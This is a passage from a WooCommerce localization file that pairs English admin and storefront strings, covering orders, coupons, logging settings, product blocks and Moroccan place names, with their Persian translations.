settings%2$s, taxes are not enabled.'=>'طبق %1$sتنظیمات فروشگاه%2$s شما، مالیات فعال نیست.','The backup datastore does not support updating orders.'=>'ذخیره اطلاعات پشتیبان، از سفارشات بروز رسانی پشتیبانی نمی‌کند.','%s is an internal meta key. Use --props to set it.'=>'%s متا کلید داخلی است. برای تنظیم آن(ها) از --props استفاده کنید.','%s is not a valid order property.'=>'%s ویژگی‌های سفارش معتبری نیستند.','New custom field name'=>'نام فیلد سفارشی جدید','WooCommerce Blocks development mode requires files to be built. From the root directory, run %1$s to ensure your node version is aligned, run %2$s to install dependencies, %3$s to build the files or %4$s to build the files and watch for changes.'=>'حالت توسعه بلوک‌های ووکامرس نیاز به ساخت فایل‌هایی دارد. از دایرکتوری root، %1$s را اجرا کنید تا مطمئن شوید نسخه گره شما هم راستا است، %2$s را برای نصب وابستگی‌ها، %3$s را برای ساخت فایل‌ها یا %4$s را برای ساخت فایل‌ها و مشاهده تغییرات اجرا کنید.','Overriding existing data with an already registered key is not allowed'=>'باطل کردن دادهٔ موجود توسط یک کلید از پیش ثبت شده مجاز نیست','Please review the errors above.'=>'لطفا خطاهای بالا را بررسی کنید.','Set up your payment methods and accept credit and debit cards, cash, bank transfers and money from your Mercado Pago account. Offer safe and secure payments with Latin America’s leading processor.'=>'روش‌های پرداخت خود را تنظیم کنید و کارت‌های اعتباری و نقدی، پول نقد، حواله‌های بانکی و پول را از حساب Mercado Pago خود بپذیرید. با پردازنده پیشرو آمریکای لاتین پرداخت‌های ایمن و مطمئن را ارائه دهید.','The metaboxhidden_product meta from the user metas.'=>'متای metaboxhidden_product از متای کاربر.','Key for the data being registered must be a string'=>'کلید داده‌های ثبت شده باید یک رشته باشد','Mercado Pago'=>'Mercado Pago','Add your products'=>'محصولات خود را اضافه کنید','Grow your business'=>'کسب و کار خود را توسعه دهید','Collect sales tax'=>'جمع‌آوری مالیات بر فروش','It\'s time to celebrate – you\'re ready to launch your store! Woo! Hit the button to preview your store and make it public.'=>'زمان جشن گرفتن فرا رسیده است - شما آماده راه اندازی فروشگاه خود هستید! هورا! برای پیش نمایش فروشگاه خود و عمومی کردن آن، دکمه را فشار دهید.','Launch your store'=>'فروشگاه خود را راه اندازی کنید','Get your products shipped'=>'محصولات خود را ارسال کنید','Current price is: %s.'=>'قیمت فعلی %s است.','Original price was: %s.'=>'قیمت اصلی %s بود.','Checkout can be customized in the Editor with your active theme.'=>'تسویه‌حساب را می‌توان در ویرایشگر با پوسته فعال شما شخصی‌سازی کرد.','To allow logging, make %s writable.'=>'برای اجازه گزارش‌گیری، %s را قابل نوشتن کنید.','Please enter a valid email to use coupon code "%s".'=>'لطفا برای استفاده از کد تخفیف "%s" یک ایمیل معتبر وارد کنید.','Please enter a valid email at checkout to use coupon code "%s".'=>'لطفا برای استفاده از کد تخفیف "%s" هنگام تسویه‌حساب یک ایمیل معتبر وارد کنید.','Local pickup: Set up pickup locations in the Local pickup settings page.'=>'دریافت حضوری: مکان‌های دریافت را در صفحه تنظیمات دریافت حضوری تنظیم کنید.','Explore a new enhanced delivery method that allows you to easily offer one or more pickup locations to your customers in the Local pickup settings page.'=>'یک روش تحویل پیشرفته جدید را کاوش کنید که به شما امکان می‌دهد به راحتی یک یا چند مکان دریافت را در صفحه تنظیمات دریافت حضوری به مشتریان خود ارائه دهید.','Gathering usage data allows us to tailor your store setup experience, offer more relevant content, and help make WooCommerce better for everyone.'=>'جمع‌آوری داده‌های استفاده به ما این امکان را می‌دهد تا تجربه راه‌اندازی فروشگاه شما را متناسب کنیم، محتوای مرتبط‌تری ارائه دهیم و به بهتر کردن ووکامرس برای همه کمک کنیم.','Please Install the WooCommerce.com Update Manager to continue receiving the updates and streamlined support included in your WooCommerce.com subscriptions. Alternatively, you can download and install it manually.'=>'لطفا WooCommerce.com Update Manager را نصب کنید تا به دریافت بروز رسانی‌ها و پشتیبانی کارآمد موجود در اشتراک‌های WooCommerce.com خود ادامه دهید. همچنین، می‌توانید آن را به صورت دستی دانلود و نصب کنید.','Please activate the WooCommerce.com Update Manager to continue receiving the updates and streamlined support included in your WooCommerce.com subscriptions.'=>'لطفا WooCommerce.com Update Manager را فعال کنید تا به دریافت بروز رسانی‌ها و پشتیبانی کارآمد موجود در اشتراک‌های WooCommerce.com ادامه دهید.',' Activate WooCommerce.com Update Manager to update.'=>' WooCommerce.com Update Manager را برای بروز رسانی فعال کنید.',' Install WooCommerce.com Update Manager to update.'=>' WooCommerce.com Update Manager را برای بروز رسانی نصب کنید.','block keywordtextarea'=>'ناحیه متنی','block descriptionA text-area field for use in the product editor.'=>'یک فیلد ناحیه متنی برای استفاده در ویرایشگر محصول.','block titleProduct textarea block'=>'بلوک ناحیه متنی محصول','block descriptionThe product subsection description.'=>'توضیح زیر بخش محصول.','block keywordsubsection'=>'زیر بخش','block titleProduct subsection description'=>'توضیحات زیربخش محصول','block keywordrich-text'=>'متن کامل','Immediately'=>'بلافاصله','Internal server error'=>'خطای داخلی سرور','Invalid %s provided.'=>'%s نامعتبر ارائه شده است.','Account Type'=>'نوع حساب کاربری','Date Paid'=>'تاریخ پرداخت','Payment method'=>'روش پرداخت','Discount (%s)'=>'تخفیف (%s)','Order not found'=>'سفارش پیدا نشد','Unique identifier of the order.'=>'شناسه منحصر به فرد سفارش.','Receipt not found'=>'رسید پیدا نشد','Application Name'=>'نام اپلیکیشن','Amount Paid'=>'مبلغ پرداخت شده','Receipt'=>'رسید','Receipt from %s'=>'رسید از %s','Summary: Order #%d'=>'خلاصه: سفارش #%d','Background process for coupon meta conversion stopped'=>'پردازش پس‌زمینه برای تبدیل متای کوپن متوقف شد','Background process for coupon meta conversion not started, nothing done.'=>'پردازش پس‌زمینه برای تبدیل متای کوپن شروع نشده است، هیچ کاری انجام نشده است.','Background process for coupon meta conversion started'=>'پردازش پس‌زمینه برای تبدیل متا کوپن آغاز شد','Background process for coupon meta conversion already started, nothing done.'=>'پردازش پس‌زمینه برای تبدیل متای کوپن قبلا شروع شده است، هیچ کاری انجام نشده است.','Convert order coupon data to the simplified format'=>'تبدیل داده‌های کوپن سفارش، به فرمت ساده شده','Stop converting'=>'توقف تبدیل','Stop converting order coupon data to the simplified format'=>'توقف تبدیل داده‌های کوپن سفارش، به فرمت ساده شده','Expiration date formatted as yyyy-mm-dd.'=>'تاریخ انقضا به صورت yyyy-mm-dd قالب‌بندی شده.','Number of days to be added to the current date to get the expiration date.'=>'تعداد روزهایی که باید به تاریخ فعلی اضافه شود تا تاریخ انقضا به دست آید.','True to force the creation of a new receipt even if one already exists and has not expired yet.'=>'درست است برای ایجاد اجباری یک رسید جدید، حتی اگر قبلا یک رسید وجود داشته باشد و هنوز منقضی نشده باشد.','This will stop the background process that converts coupon_data order item meta entries to simplified coupon_info entries. There are currently %d entries that can be converted.'=>'این کار فرایند پس‌زمینه‌ی تبدیل قسمت‌های متای coupon_data در سفارشات به قسمت‌های ساده‌شده‌ی coupon_info را متوقف خواهد کرد. در حال حاضر %d ورودی برای تبدیل وجود دارد.','This will convert coupon_data order item meta entries to simplified coupon_info entries. The conversion will happen overtime in the background (via Action Scheduler). There are currently no entries to convert.'=>'این فرایند، قسمت‌های متای coupon_data در سفارشات را به قسمت‌های ساده‌شده‌ی coupon_info تبدیل می‌کند. تبدیل به صورت خودکار در پس‌زمینه و به مرور زمان انجام خواهد شد (از طریق زمان‌بندی عملیات). در حال حاضر ورودی برای تبدیل وجود ندارد.','This will convert coupon_data order item meta entries to simplified coupon_info entries. The conversion will happen overtime in the background (via Action Scheduler). There are currently %d entries that can be converted.'=>'این فرایند، قسمت‌های متای coupon_data در سفارشات را به قسمت‌های ساده‌شده‌ی coupon_info تبدیل می‌کند. تبدیل به صورت خودکار و در پس‌زمینه، به مرور زمان انجام خواهد شد (با استفاده از زمان‌بندی عملیات). در حال حاضر %d ورودی برای تبدیل وجود دارد.','AID'=>'AID','Sorry, you cannot delete resources.'=>'متاسفانه ! شما نمی‌توانید منابع را حذف کنید.','Sorry, you cannot create resources.'=>'متاسفانه ! شما نمی‌توانید منابع ایجاد کنید.','Sorry, you cannot view resources.'=>'متاسفانه ! شما نمی‌توانید منابع را مشاهده کنید.','Public url of the receipt.'=>'آدرس اینترنتی عمومی رسید.','Expiration date of the receipt, formatted as yyyy-mm-dd.'=>'تاریخ انقضاء سررسید، قالب‌بندی شده به صورت yyyy-mm-dd.','Next image'=>'عکس بعدی','Previous image'=>'تصویر قبلی','Clear data'=>'پاکسازی داده','Clearing data...'=>'در حال پاکسازی داده...','Directory size: %s'=>'حجم پوشه: %s','Start converting'=>'آغاز تبدیل','Start converting order coupon data to the simplified format'=>'آغاز تبدیل داده‌های کوپن سفارش، به فرمت ساده شده','No orders in need of cleanup'=>'هیچ سفارشی نیاز به پاکسازی ندارد','Order legacy data cleanup has been canceled.'=>'پاکسازی داده‌های قدیمی سفارش لغو شد.','Order legacy data cleanup process has been started.'=>'فرآیند پاکسازی داده‌های قدیمی سفارش آغاز شد.','Clean up order data from legacy tables'=>'پاکسازی داده‌های سفارش از جداول قدیمی','This tool will clear the data from legacy order tables in WooCommerce.'=>'این ابزار، داده‌ها را از جداول قدیمی سفارش در ووکامرس پاک می‌کند.','%d is not an order or has an invalid order type.'=>'%d یک سفارش نیست یا یک نوع سفارش نامعتبر است.','Please use different source (--from) and destination (--to) datastores.'=>'لطفا از منبع داده‌های مختلف (--از) و مقصد (--به) استفاده کنید.','An error occurred while backfilling order %1$d from %2$s to %3$s: %4$s'=>'هنگام تکمیل سفارش %1$d از %2$s به %3$s خطایی رخ داد: %4$s','Only available when HPOS is authoritative and compatibility mode is disabled.'=>'فقط زمانی در دسترس است که HPOS معتبر باشد و حالت سازگاری غیرفعال باشد.','The %s hook has a filter set, so some log files may have different retention settings.'=>'هوک %s دارای یک مجموعه فیلتر است، بنابراین برخی از فایل‌های گزارش ممکن است تنظیمات نگهداری متفاوتی داشته باشند.','Order %1$d legacy data could not be cleaned up during batch process. Error: %2$s'=>'داده قدیمی سفارش %1$d در طول فرآیند دسته‌ای پاک نمی‌شود. خطا: %2$s','\'%s\' is not a valid datastore.'=>'\'%s\' انبار داده معتبری نیست.','Order legacy cleanup failed for an entire batch of orders. Aborting cleanup.'=>'پاک‌سازی سفارشات قدیمی برای یک دسته کامل از سفارشات با شکست مواجه شد. پاکسازی لغو می‌شود.','Order %1$d backfilled from %2$s to %3$s.'=>'سفارش %1$d از %2$s تا %3$s دوباره پر شد.','Please provide a valid order ID.'=>'لطفا یک شناسه سفارش معتبر ارائه دهید.','Discount type.'=>'نوع تخفیف.','Create and save'=>'ایجاد یا ذخیره','Logging.'=>'ثبت وقایع.','The number of days log entries are retained.'=>'تعداد روزهایی که ورودی‌های گزارش نگه داشته می‌شوند.','How many days log entries will be kept before being auto-deleted.'=>'چند روز قبل از حذف خودکار، ورودی‌های گزارش نگهداری می‌شوند.','Minimum severity level.'=>'حداقل سطح آستانه.','The minimum severity level of logs that will be stored.'=>'حداقل سطح آستانه گزارش‌هایی که ذخیره می‌شوند.','The image upload failed: "%s", creating the product without image'=>'آپلود تصویر ناموفق بود: "%s"، محصول بدون تصویر ایجاد شد','Skhirat-Témara'=>'Skhirat-Témara','Sidi Youssef Ben Ali'=>'Sidi Youssef Ben Ali','Nouaceur'=>'Nouaceur','Marrakech-Menara'=>'Marrakech-Menara','Marrakech-Medina'=>'Marrakech-Medina','M’diq-Fnideq'=>'M’diq-Fnideq','Inezgane-Aït Melloul'=>'Inezgane-Aït Melloul','Fès-Dar-Dbibegh'=>'Fès-Dar-Dbibegh','Fahs-Beni Makada'=>'Fahs-Beni Makada','Chtouka Aït Baha'=>'Chtouka Aït Baha','Whether the coupon grants free shipping or not.'=>'آیا کوپن، ارسال رایگان ارائه می‌دهد یا خیر.','Discount amount as defined in the coupon (absolute value or a percent, depending on the discount type).'=>'مقدار تخفیف طبق تعریف در کوپن (مقدار ثابت یا درصد، بسته به نوع تخفیف).','Handler'=>'دستی','Invalid plugin slug provided in the plugins activated rule.'=>'نامک افزونه نامعتبر در قانون فعال‌سازی افزونه‌ها ارائه شده است.','The logging handler class.'=>'کلاس مدیریت ثبت وقایع (logging handler).','The size of the log directory.'=>'اندازه پوشه خطاها.','The total size of the files in the log directory.'=>'اندازه کل فایل‌ها در پوشه خطا.','Log directory size'=>'اندازه پوشه خطاها','How log entries are being stored.'=>'نحوه ذخیره ورودی‌های گزارش.','Is logging enabled?'=>'آیا ورود به سیستم فعال است؟','Logging'=>'ورود به سیستم','Zagora'=>'Zagora','Youssoufia'=>'Youssoufia','Tan-Tan'=>'Tan-Tan','Tangier-Assilah'=>'Tangier-Assilah','Tiznit'=>'Tiznit','Tinghir'=>'Tinghir','Tétouan'=>'Tétouan','Taza'=>'Taza','Tata'=>'Tata','Taroudant'=>'Taroudant','Taounate'=>'Taounate','Taourirt'=>'Taourirt','Tarfaya (EH-partial)'=>'Tarfaya (EH-partial)','Sidi Slimane'=>'Sidi Slimane','Sidi Kacem'=>'Sidi Kacem','Sidi Ifni'=>'Sidi Ifni','Sidi Bennour'=>'Sidi Bennour','Settat'=>'Settat','Sefrou'=>'Sefrou','Salé'=>'Salé','Safi'=>'Safi','Rehamna'=>'Rehamna','Rabat'=>'Rabat','Ouezzane'=>'Ouezzane','Oujda-Angad'=>'Oujda-Angad','Oued Ed-Dahab'=>'Oued Ed-Dahab','Ouarzazate'=>'Ouarzazate','Nador'=>'Nador','Moulay Yacoub'=>'Moulay Yacoub','Mohammedia'=>'Mohammedia','Midelt'=>'Midelt','Meknès'=>'Meknès','Médiouna'=>'Médiouna','Marrakech'=>'Marrakech','Larache'=>'Larache','Laâyoune'=>'Laâyoune','Khouribga'=>'Khouribga','Khénifra'=>'Khénifra','Khemisset'=>'Khemisset','Kelaat Sraghna'=>'Kelaat Sraghna','Kénitra'=>'Kénitra','Jerada'=>'Jerada','El Jadida'=>'El Jadida','Ifrane'=>'Ifrane','Al Hoceïma'=>'Al Hoceïma','Al Haouz'=>'Al Haouz','El Hajeb'=>'El Hajeb','Guercif'=>'Guercif','Guelmim'=>'Guelmim','Fquih Ben Salah'=>'Fquih Ben Salah','Figuig'=>'Figuig','Errachidia'=>'Errachidia','Essaouira'=>'Essaouira','Driouch'=>'Driouch','Agadir-Ida Ou Tanane'=>'Agadir-Ida Ou Tanane','Chichaoua'=>'Chichaoua','Chefchaouen'=>'Chefchaouen','Casablanca'=>'Casablanca','Berrechid'=>'Berrechid','Boulemane'=>'Boulemane','Boujdour'=>'Boujdour','Ben Slimane'=>'Ben Slimane','Berkane'=>'Berkane','Béni-Mellal'=>'Béni-Mellal','Azilal'=>'Azilal','block titleAdditional Fields'=>'فیلدهای اضافی','block titleAdditional Field List'=>'فهرست فیلد اضافی','block titleAdditional information'=>'اطلاعات اضافی','block keywordlist'=>'فهرست','block titleProduct details section description'=>'توضیحات بخش جزئیات محصول','block descriptionThe product details section description.'=>'توضیحات بخش جزئیات محصول.','block keywordlinked'=>'مرتبط','block descriptionThe linked product list.'=>'فهرست محصول مرتبط.','block titleLinked product list'=>'فهرست محصول مرتبط','block descriptionDisplay the list of additional field values from the current order.'=>'لیست مقادیر زمینۀ اضافی را از ترتیب فعلی نمایش دهید.','block descriptionRender additional fields in the \'Additional information\' location.'=>'زمینه‌های اضافی را در مکان «اطلاعات بیشتر» ارائه دهید.','block descriptionDisplay additional checkout fields from the \'contact\' and \'order\' locations.'=>'فیلدهای پرداخت اضافی را در جایگاه «تماس» و «سفارش» نمایش دهید.','Medium'=>'متوسط','Re-schedule'=>'زمان‌بندی دوباره','Un-schedule'=>'لغو زمان‌بندی','Re-schedule expired transient files cleanup'=>'پاک‌سازی پرونده‌های گذرای منقضی شده را دوباره زمان‌بندی کنید','Schedule expired transient files cleanup'=>'پاک‌سازی پرونده‌های گذرای منقضی شده را زمان‌بندی کنید','Schedule the action to delete expired transient files for running immediately. Subsequent actions will run once every 24h.'=>'زمان‌بندی اقدام برای حذف فایل‌های گذرای منقضی شده برای اجرای فوری. اقدامات بعدی هر ۲۴ ساعت یک بار اجرا می‌شود.','Remove the currently scheduled action to delete expired transient files, then schedule it again for running immediately. Subsequent actions will run once every 24h.'=>'اقدام زمان‌بندی شده فعلی برای حذف فایل‌های گذرای منقضی شده را حذف کنید، سپس مجددا آن را برای اجرای بلافاصله، زمان‌بندی کنید. اقدامات بعدی هر ۲۴ ساعت یک بار اجرا می‌شوند.','Tip: By suggesting complementary products in the cart using cross-sells, you can significantly increase the average order value.'=>'نکته: با پیشنهاد دادن محصولات مکمل در سبد خرید با استفاده از فروش‌های متقابل، می‌توانید به طور قابل توجهی میانگین ارزش سفارش را افزایش دهید.','Remove the currently scheduled action to delete expired transient files. Expired files won\'t be automatically deleted until the \'Schedule expired transient files cleanup\' tool is run again.'=>'اقدام زمان‌بندی شده‌ی فعلی برای حذف فایل‌های گذرای منقضی شده را لغو کنید. تا زمان اجرای مجدد ابزار «پاکسازی خودکار فایل‌های گذرای منقضی شده»، فایل‌های منقضی شده به صورت خودکار حذف نخواهند شد.','Un-schedule expired transient files cleanup'=>'پاک‌سازی پرونده‌های گذرای منقضی شده را از زمان‌بندی خارج کنید','By suggesting complementary products in the cart using cross-sells, you can significantly increase the average order value. %1$sLearn more about linked products%2$s'=>'با پیشنهاد محصولات مکمل در سبد خرید با استفاده از فروش متقابل، می‌توانید میانگین ارزش سفارش را به میزان قابل توجهی افزایش دهید. %1$sدرباره محصولات مرتبط بیشتر بدانید%2$s','Include downloads'=>'شامل دانلودها','Database settings'=>'تنظیمات پایگاه‌داده','Customer Email'=>'ایمیل مشتری','File system settings'=>'تنظیمات فایل سیستم','Linked products'=>'محصولات مرتبط','⚠️ This directory does not appear to be writable.'=>'⚠️ به نظر نمی‌رسد که این دایرکتوری قابل نوشتن باشد.','You do not have permission to manage logging settings.'=>'شما مجوز مدیریت تنظیمات گزارش گیری را ندارید.','Log entries are stored in this database table: %s'=>'ورودی‌های گزارش در این جدول پایگاه‌داده ذخیره می‌شوند: %s','Unable to start synchronization. The link you followed may have expired.'=>'شروع همگام‌سازی ممکن نیست. ممکن است پیوند دنبال‌شده منقضی شده باشد.','Log files are stored in this directory: %s'=>'فایل‌های گزارش در این پوشه ذخیره می‌شوند: %s','Tip: Upsells are products that are extra profitable or better quality or more expensive. Experiment with combinations to boost sales.'=>'راهنما: Upsell ها محصولاتی هستند که سودآورتر، باکیفیت‌تر یا گران‌تر هستند. با ترکیب‌های مختلف آن‌ها را امتحان کنید تا فروش خود را افزایش دهید.','Upsells are typically products that are extra profitable or better quality or more expensive. Experiment with combinations to boost sales. %1$sLearn more about linked products%2$s'=>'محصولات افزایشی معمولاً محصولاتی هستند که سودآوری فوق‌العاده یا کیفیت بهتری دارند یا گران‌تر هستند. برای افزایش فروش، ترکیبات مختلف را آزمایش کنید. %1$sدرباره محصولات مرتبط بیشتر بدانید%2$s','No differences found.'=>'هیچ تفاوتی پیدا نشد.','Differences found for order %d:'=>'تفاوت‌های پیدا شده برای سفارش %d:','Level threshold'=>'سطح آستانه','This sets the minimum severity level of logs that will be stored. Lower severity levels will be ignored. "None" means all logs will be stored.'=>'این تنظیم حداقل سطح آستانه گزارش‌هایی که ذخیره می‌شوند را تعیین می‌کند. سطوح اهمیت پایین‌تر نادیده گرفته می‌شوند. "هیچ" به این معناست که تمامی گزارش‌ها ذخیره خواهند شد.','Log storage'=>'ذخیره‌سازی گزارش','Retention period'=>'دوره نگهداری','This sets how many days log entries will be kept before being auto-deleted.'=>'این تنظیم مشخص می‌کند گزارش‌ها تا چند روز نگهداری و سپس به صورت خودکار حذف می‌شوند.','This determines where log entries are saved.'=>'این تعیین می‌کند که ورودی‌های گزارش در کجا ذخیره شوند.','This setting cannot be changed here because it is being set by a filter on the %s hook.'=>'اینجا امکان تغییر این تنظیم وجود ندارد زیرا توسط یک فیلتر روی قلاب "%s" تنظیم می‌شود.','This setting cannot be changed here because it is defined in the %1$s constant, probably in your %2$s file.'=>'اینجا امکان تغییر این تنظیم وجود ندارد زیرا در ثابت %1$s تعریف شده است، احتمالا در فایل %2$s شما.','Logs settings'=>'تنظیمات گزارش‌ها','Database (not recommended on live sites)'=>'پایگاه‌داده (در سایت‌های فعال توصیه نمی‌شود)','Logging is disabled. It can be enabled in Logs Settings.'=>'گذارش‌گیری غیرفعال است. می‌توان آن را در تنظیمات گزارش‌ها فعال کرد.','An error occurred while computing a diff for order %1$d: %2$s'=>'هنگام محاسبه تفاوت برای سفارش %1$d خطایی روی داد: %2$s','Orders subject to cleanup: %d'=>'سفارشات مشمول پاکسازی: %d','Unsynced orders: %d'=>'سفارشات همگام‌سازی نشده: %d','Compatibility mode enabled?: %s'=>'حالت سازگاری فعال است؟: %s','HPOS enabled?: %s'=>'HPOS فعال است؟: %s','Note that if this setting is changed, any log entries that have already been recorded will remain stored in their current location, but will not migrate.'=>'توجه داشته باشید که اگر این تنظیم تغییر کند، هر ورودی گزارشی که قبلا ثبت شده است در مکان فعلی خود خواهد ماند، اما انتقال نمی‌یابد.','This setting cannot be changed here because it is defined in the %s constant.'=>'این تنظیم را نمی‌توان در اینجا تغییر داد زیرا در ثابت %s تعریف شده است.','A single physical or virtual product, e.g. a t-shirt or an eBook.'=>'یک محصول فیزیکی یا مجازی، به عنوان مثال. یک تی‌شرت یا یک کتاب الکترونیکی.','Affiliate product'=>'محصول افیلیت','A link to a product sold on a different website, e.g. brand collab.'=>'یک پیوند به یک محصول فروخته شده در یک وب‌سایت دیگر، به عنوان مثال. همکاری برند.','Logger'=>'ثبت‌کننده گزارش','A set of products that go well together, e.g. camera kit.'=>'مجموعه‌ای از محصولات که به خوبی با هم هماهنگی دارند، به عنوان مثال. کیت دوربین.','File system (default)'=>'فایل سیستم (پیشفرض)','%1$s log file from source %2$s was deleted.'=>'%1$s فایل گزارش از منبع %2$s حذف شد.','Airwallex Payments'=>'پرداخت‌های Airwallex','Boost international sales and save on FX fees. Accept 60+ local payment methods including Apple Pay and Google Pay.'=>'افزایش فروش بین‌المللی و صرفه جویی در هزینه‌های کارمزد معاملات خارجی. بیش از ۶۰ روش پرداخت محلی از جمله Apple Pay و Google Pay را بپذیرید.','Integrate your WooCommerce store with 5000+ cloud apps and services today. Trusted by 11,000+ users.'=>'امروز فروشگاه ووکامرس خود را با بیش از ۵۰۰۰ برنامه و سرویس ابری ادغام کنید. مورد اعتماد بیش از ۱۱۰۰۰ کاربر.','Delight customers and boost organic sales with a special WooCommerce birthday email (and coupon!) on their special day.'=>'مشتریان خود را با یک ایمیل تولد ویژه ووکامرس (و کوپن!) در روز خاصشان خوشحال کنید و فروش طبیعی را افزایش دهید.','Give away a free item to any customer with the coupon code.'=>'به هر مشتری با کد کوپن یک کالای رایگان هدیه دهید.','Create "store credit" coupons for customers which are redeemable at checkout.'=>'کوپن‌های «اعتبار فروشگاه» برای مشتریان ایجاد کنید که در هنگام پرداخت قابل استفاده هستند.','Create a unique URL that applies a discount and optionally adds one or more products to the customer\'s cart.'=>'یک URL منحصر به فرد ایجاد کنید که تخفیف اعمال می‌کند و به صورت اختیاری یک یا چند محصول را به سبد خرید مشتری اضافه می‌کند.','Generate dynamic personalized coupons for your customers that increase purchase rates.'=>'کوپن‌های شخصی‌سازی شده پویا را برای مشتریان خود ایجاد کنید که نرخ خرید را افزایش می‌دهد.','Sync your website\'s data like contacts, products, and orders over Salesforce CRM with Salesforce Integration for WooCommerce.'=>'داده‌های وب‌سایت خود مانند مخاطبین، محصولات و سفارشات را از طریق Salesforce CRM با Salesforce Integration for WooCommerce همگام سازی کنید.','Turn your product images into stunning videos that engage and convert audiences - no video experience required.'=>'تصاویر محصول خود را به ویدیوهای خیره کننده‌ای تبدیل کنید که مخاطبان را جذب و تبدیل می‌کند - بدون نیاز به تجربه ویدیویی.','Collect and showcase verified reviews that consumers trust.'=>'نظرات تایید شده‌ای را که مصرف کنندگان به آنها اعتماد دارند جمع‌آوری کرده و به نمایش بگذارید.','Harness data from WooCommerce to grow your business. Manage leads, customers, and segments, through automation, quotes, invoicing, billing, and email marketing. Power up your store with CRM.'=>'برای رشد کسب و کار خود از داده‌های ووکامرس استفاده کنید. از طریق اتوماسیون، قیمت‌ها، صورت‌حساب، فاکتور و بازاریابی ایمیلی، سرنخ‌ها، مشتریان و بخش‌ها را مدیریت کنید. فروشگاه خود را با CRM تقویت کنید.','Powerful, "all in one" solution for gift certificates, store credits, discount coupons and vouchers.'=>'راه‌حل قدرتمند و جامع برای کارت‌های هدیه، اعتبارات فروشگاه، کوپن‌های تخفیف و ووچر.','Coupons for groups. Provides the option to have coupons that are restricted to group members or roles. Works with the free Groups plugin.'=>'کوپن برای گروه‌ها: امکان ایجاد کوپن‌های تخفیف ویژه برای اعضای گروه یا نقش‌های خاص را فراهم می‌کند. با افزونه رایگان Groups کار می‌کند.','Sales channels'=>'کانال‌های فروش','Conversion'=>'تبدیل','Boost your organic sales by adding a customer referral program to your WooCommerce store.'=>'با افزودن یک برنامه ارجاع مشتری به فروشگاه ووکامرس، فروش طبیعی خود را افزایش دهید.','Convert and retain customers with automated marketing that does the hard work for you.'=>'با بازاریابی خودکار که کار سختی را برای شما انجام می‌دهد، مشتریان را تبدیل و حفظ کنید.','Send targeted campaigns, recover abandoned carts and more with Mailchimp.'=>'با Mailchimp، کمپین‌های هدفمند ارسال کنید، سبدهای خرید رها شده را بازیابی کنید و کارهای بیشتری انجام دهید.','Create advertising campaigns and reach one billion global users with TikTok for WooCommerce.'=>'با TikTok for WooCommerce کمپین‌های تبلیغاتی ایجاد کنید و به یک میلیارد کاربر جهانی دسترسی پیدا کنید.','CRM'=>'CRM','Automations'=>'اتوماسیون‌ها','Sales of the marketing campaign.'=>'فروش‌های کمپین بازاریابی.','Grow your business on Pinterest! Use this official plugin to allow shoppers to Pin products while browsing your store, track conversions, and advertise on Pinterest.'=>'کسب و کار خود را در پینترست توسعه دهید! از این افزونه رسمی استفاده کنید تا به خریداران اجازه دهید هنگام مرور فروشگاه شما، محصولات را پین کنند، تبدیل‌ها را پیگیری کنید و در پینترست تبلیغ کنید.','Limit result set to specific amount of suggested products.'=>'مجموعه نتایج را به مقدار خاصی از محصولات پیشنهادی محدود کنید.','Limit result set to specific product categorie ids.'=>'مجموعه نتایج را به شناسه‌های دسته‌بندی محصول خاص محدود کنید.','Limit result set to specific product tag ids.'=>'مجموعه نتایج را به شناسه‌های برچسب محصول خاص محدود کنید.','Override the "woocommerce_date_type" option that is used for the database date field considered for revenue reports.'=>'گزینه "woocommerce_date_type" را که برای فیلد تاریخ پایگاه داده در نظر گرفته شده برای گزارش‌های درآمد استفاده می‌شود، لغو کنید.','Invalid layout template ID.'=>'شناسه طرح‌بندی قالب نامعتبر است.','Area to get templates for.'=>'محیطی برای دریافت قالب‌ها.','The downloadable file %s cannot be used as it does not exist on the server, or is not located within an approved directory. Please contact a site administrator for help. %2$sLearn more.%3$s'=>'فایل قابل دانلود %s قابل استفاده نیست زیرا در سرور وجود ندارد یا در پوشه‌ای مجاز قرار نگرفته است. لطفا برای دریافت راهنمایی با مدیر سایت تماس بگیرید. %2$sکسب اطلاعات بیشتر.%3$s','Sorry, you cannot create dummy products.'=>'متاسفانه ! شما نمی‌توانید محصولات ساختگی ایجاد کنید.','Could not start the installation process. Reason: '=>'نمی‌توان فرآیند نصب را شروع کرد. دلیل: ','block titleProduct list'=>'فهرست محصول','block descriptionThe product list.'=>'فهرست محصول.','block descriptionThe product section description.'=>'توضیح بخش محصول.','block titleProduct section description'=>'توضیح بخش محصول','block descriptionEnable customers to filter the product collection by rating.'=>'مشتریان را قادر می‌سازد تا مجموعه محصول را بر اساس امتیاز فیلتر کنند.','Total orders'=>'مجموع سفارش‌ها','Total revenue'=>'درآمد کل','Device type'=>'نوع دستگاه','Direct'=>'مستقیم','Show details'=>'نمایش جزئیات','Hide details'=>'مخفی کردن جزئیات','Source type'=>'نوع منبع','Source: %s'=>'منبع: %s','Order not found.'=>'سفارش یافت نشد.','Products in this group'=>'محصولات در این گروه','Match images'=>'تطبیق تصاویر','Web admin'=>'مدیر وب','The number of unique pages viewed by the customer prior to this order.'=>'تعداد صفحات منحصر به فردی که مشتری قبل از این سفارش مشاهده کرده است.','This is the Customer Lifetime Value, or the total amount you have earned from this customer\'s orders.'=>'این ارزش طول عمر مشتری یا کل مبلغی است که از سفارشات این مشتری به دست آورده‌اید.','Additional fields to be persisted on the order.'=>'فیلدهای اضافی باید در سفارش باقی بماند.','Enable this feature to track and credit channels and campaigns that contribute to orders on your site'=>'این ویژگی را برای ردیابی و اعتبار کانال‌ها و کمپین‌هایی که به سفارش‌های سایت شما کمک می‌کنند، فعال کنید','Origin'=>'مبدا','Organic: %s'=>'اورگانیک: %s','Referral: %s'=>'مراجعه: %s','Order attribution field: %s'=>'فیلد تخصیص سفارش: %s','Set product featured image when uploaded image file name matches product SKU.'=>'در صورتی که نام فایل تصویر بارگذاری شده با SKU محصول مطابقت داشته باشد، تصویر شاخص تنظیم شود.','Make a collection of related products, enabling customers to purchase multiple items together.'=>'مجموعه‌ای از محصولات مرتبط را ایجاد کنید، که مشتریان را قادر می‌سازد چندین مورد را با هم خریداری کنند.','Session page views'=>'بازدیدهای صفحه جلسه','Value of type %s was posted to the order attribution callback'=>'مقدار نوع %s به تابع فراخوانی انتساب سفارش ارسال شد','Add any files you\'d like to make available for the customer to download after purchasing, such as instructions or warranty info. Store-wide updates can be managed in your %1$sproduct settings%2$s.'=>'هر پرونده‌ای را که می‌خواهید پس از خرید برای بارگیری در دسترس مشتری قرار دهید، مانند دستورالعمل‌ها یا اطلاعات ضمانت، اضافه کنید. بروز رسانی‌های فروشگاه را می‌توان در %1$sتنظیمات محصول %2$s مدیریت 